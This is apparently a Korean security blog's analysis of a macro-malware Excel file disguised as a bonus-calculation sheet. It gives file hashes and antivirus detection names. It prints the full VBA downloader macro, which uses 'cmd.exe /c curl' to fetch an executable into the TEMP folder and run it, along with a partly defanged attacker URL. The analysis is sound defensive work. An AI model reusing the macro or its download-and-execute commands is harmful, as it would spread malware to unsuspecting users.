꿈을꾸는 파랑새

오늘은 상여금 계산 엑셀 파일로 위장한 악성코드인 상여금처리산식. xls에 대해 알아보겠습니다.
상여금(賞與金)이라는것은 정기적으로 지급되는 급여 이외의 급여를 말하면 여기서 정기적으로 지급되는 급여는 일급,주급,월급과 같이 일정한 기간(일반적으로 월)을 단위로 하여 규칙적, 반복적으로 지급되는 급여를 의미합니다. 오늘은 이런 상여금을 계산을 도와준다고 해서 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명:상여금처리산식.xls
사이즈:44.5 KB
CRC32:9c36c9ef
MD5:8452e1ad98dc9d446e3ce39214777a96
SHA-1:fb822f69195dff9b9127c977560a9234fdcb2c04
SHA-256:b3888bd2d679a9188b526dcae775e5834e726170c8d8356979a565697015c796
SHA-512:27416c35631d7ce94187f87f9c4d7befc24cfb1890047fe76977cc8ad6147bf19607d277f5a66e93c01c041651257606e64e353f634c486e55e1c34678af1f10
기본적으로 해당 악성코드를 열면 매크로 악성코드이기 때문에 해당 악성코드를 실행하면 보안경고 매크로를 사용할 수 없도록 설정했습니다. 라고 돼 있는 것을 확인할 수가 있습니다.

상여금처리산식 악성코드 실행
상여금처리산식 악성코드 실행

그리고 해당 악성코드를 실행하고 매크로를 실행하면 매크로가 실행돼서 악성코드가 다운로드 되게 설정이 돼 있습니다. 그리고 해당 악성코드의 매크로는 다음과 같습니다. 다행인 것 암호가 안 걸려져 있어서 해당 매크로는 쉽게 확인을 할 수가 있었습니다. 매크로는 다음과 같습니다.

상여금처리산식 매크로
상여금처리산식 매크로

Private Const HKEY_CURRENT_USER = &H80000001
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
Private Declare PtrSafe Function RegSetValueEx Lib "advapi32" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare PtrSafe Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare PtrSafe Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Function fileDownload()
    Dim (exeUrl) As String
    Dim (cmdRun)As String
    Dim (defDir) As String
    exeUrl = Worksheets("Sheet1").(Cells)(1000(1), 1).Value
    exeUrl = Replace(exeUrl, "&", "^&")
    defDir = Environ("TEMP") + "\fileDownloader(.)exe"
    cmdRun = "cmd.exe /c curl " (+) exeUrl (+) " --output " (+) defDir
    Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
    Dim counts As Integer
    counts = 0
    'DirFile = "C:\temp\fileDownloader.exe"
    If fso.FileExists(defDir) Then
    Else
        'Shell "cmd.exe /c curl http://106.249.253(.)146:12582/common/malDownFilePath.do?trnKey=20200122nleSLHhG^&type=(fileDownload)^&trnType=EML^&statType=XLS_RAN_EXEC --output C:\temp\filedownload.exe", vbNormalNoFocus
        Shell cmdRun, vbNormalNoFocus
    End If
   
    Do
        If fso.FileExists(DirFile) Then
            Application.Wait (Now + TimeValue("0:00:01"))
            Exit Do
        Else
            If counts < 5 Then
                Application.Wait (Now + TimeValue("0:00:01"))
                counts = counts + 1
            Else
                Exit Do
            End If
        End If
    Loop
        
     Shell "cmd.exe /c " (+) defDir, vbNormalNoFocus
   
End Function

그런데 악성코드 이름이 보통은 상여금계산기 아니면 상여금 지급내역 계산으로 하는데 상여금처리산식 이라는 것이 북한 서럽게 느껴지기도 합니다. 아무튼, 악성코드는 악성코드 동작은 다음과 같습니다.
cmd.exe /c curl aa --output C:\Users\admin\AppData\Local\Temp\fileDownloader.exe
해서 이렇게 최종적으로 fileDownloader.exe 이라는 파일을 다운로드 합니다.
cmd.exe /c C:\Users\admin\AppData\Local\Temp\fileDownloader.exe
악성코드는 VirusTotal(바이러스토탈) 2022-11-04 17:37:59 UTC로 탐지하는 보안 업체들은 다음과 같습니다.
Ad-Aware:VB:Trojan.Valyria.5775
ALYac:VB:Trojan.Valyria.5775
Antiy-AVL:Trojan/Generic.ASMacro.1421A
Arcabit:VB:Trojan.Valyria.D168F
Avast:Script:SNH-gen [Trj]
AVG:Script:SNH-gen [Trj]
Avira (no cloud):HEUR/Macro.Downloader.MRAFI.Gen
BitDefender:VB:Trojan.Valyria.5775
Cynet:Malicious (score: 99)
Cyren:X97M/Agent.BEQ.gen!Eldorado
Elastic:Malicious (high Confidence)
Emsisoft:VB:Trojan.Valyria.5775 (B)
eScan:VB:Trojan.Valyria.5775
Fortinet:VBA/Agent.ECH!tr.dldr
GData:VB:Trojan.Valyria.5775
Google:Detected
Kaspersky:HEUR:Trojan.MSOffice.Stratos.gen
MAX:Malware (ai Score=88)
Microsoft:TrojanDownloader:O97M/Powdow.RVBT!MTB
NANO-Antivirus:Trojan.Ole2.Vbs-heuristic.druvzi
Sangfor Engine Zero:Trojan.Generic-Macro.Save.43501494
SentinelOne (Static ML):Static AI - Malicious OLE
Symantec:ISB.Downloader!gen456
TACHYON:Suspicious/X97M.XSR.Gen
Tencent:Heur.Macro.Generic.a.bdb8d815
Trellix (FireEye):VB:Trojan.Valyria.5775
VIPRE:VB:Trojan.Valyria.5775
일단 대부분은 탐지하고 있지만 ESET(이셋),안랩 V3는 탐지를 못 하고 있어서 일단 해당 글을 쓰고 신고는 진행을 하겠습니다.
상여금 계산을 하는 것을 노리고 이런 엑셀 파일로 된 매크로 악성코드도 유포되고 있으니 항상 백신프로그램은 최신 상태로 유지하시길 바랍니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band